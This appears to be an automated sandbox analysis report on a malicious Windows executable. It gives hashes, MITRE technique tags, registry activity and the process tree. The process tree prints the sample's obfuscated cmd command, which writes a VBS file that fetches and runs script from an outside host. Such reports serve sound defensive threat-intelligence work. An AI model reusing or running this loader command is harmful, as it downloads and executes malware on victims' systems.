0e7c1a20ca3eda9ce134734e536bbdb79c707c84574e4fde8633960f290499b3

Analysis

max time kernel
30s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
07-04-2023 00:44

Target

FACT_D755N50T2.exe
Size

1.5MB
MD5

35e24a8ce72dd5360fc826947abfdc10
SHA1

929e014f9d6271ae3ce82d5dadcd674631c9c779
SHA256

d0fbbba4a32cf5156daf563e6fa9b2133cc11b85a7a2632411eb7195ab35e9c7
SHA512

558bc4ac4c9da60fea107037789cfa7cb0cbe10829687bf50f71afb0cfa51bc74f5d5f478c59914e8e55f5b6bd4d9e487a3b1286327491189aa5e90f0c38cf4e
SSDEEP

24576:Z6Ykri0w6Hf0PjnVlYI5YALlgKPlDQKimQn+IZQaL89V6pZE1rrrrrrrrrrrrrrl:pKw6/0zVlYIqXKNKmGZXgZpO8

Score

8^/10

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

22 2768 WScript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings cmd.exe

flow	pid	process
22	2768	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

FACT_D755N50T2.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3680 wrote to memory of 2292	3680	FACT_D755N50T2.exe	cmd.exe
PID 3680 wrote to memory of 2292	3680	FACT_D755N50T2.exe	cmd.exe
PID 3680 wrote to memory of 2292	3680	FACT_D755N50T2.exe	cmd.exe
PID 2292 wrote to memory of 2884	2292	cmd.exe	cmd.exe
PID 2292 wrote to memory of 2884	2292	cmd.exe	cmd.exe
PID 2292 wrote to memory of 2884	2292	cmd.exe	cmd.exe
PID 2884 wrote to memory of 4208	2884	cmd.exe	cmd.exe
PID 2884 wrote to memory of 4208	2884	cmd.exe	cmd.exe
PID 2884 wrote to memory of 4208	2884	cmd.exe	cmd.exe
PID 4208 wrote to memory of 2768	4208	cmd.exe	WScript.exe
PID 4208 wrote to memory of 2768	4208	cmd.exe	WScript.exe
PID 4208 wrote to memory of 2768	4208	cmd.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe
"C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>%Public%\re9.vBs&&%ComSpec% /c start %Public%\re9.vBs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>C:\Users\Public\re9.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs"
3⤵
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\re9.vBs"
5⤵
- Blocklisted process makes network request
PID:2768

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Public\re9.vBs

Filesize
107B

MD5
e7a1b7f622c413b656bd350365edaef2

SHA1
e769ca533dd368bb6d341e7a57c002dc6e07a289

SHA256
c0fd93d1266613402380c5f3888fe5df73103d25b6d4c848252221b06a749dbb

SHA512
b0b3871ced3eae994d050746610dc67bb02b6a8454c6fa826aec8cfdd3a0d8fe21c5e9fe44667f2c5ca85f80712006ff3fe9f08bb2694ae2a0d857e344afb861

Download Submit
memory/3680-133-0x00000000009C0000-0x0000000000B4C000-memory.dmp

Filesize
1.5MB

Download
memory/3680-137-0x00000000009C0000-0x0000000000B4C000-memory.dmp

Filesize
1.5MB

Download
memory/3680-138-0x00000000009C0000-0x0000000000B4C000-memory.dmp

Filesize
1.5MB

Download